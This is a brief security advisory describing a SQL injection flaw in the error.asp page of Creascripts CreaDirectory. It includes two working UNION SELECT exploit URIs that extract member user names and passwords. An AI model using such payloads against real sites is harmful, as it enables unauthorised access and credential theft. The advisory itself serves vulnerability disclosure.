Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

Username : http://www.example.com/error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Password:
http://www.example.com/error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members


 

Privacy Statement
Copyright 2010, SecurityFocus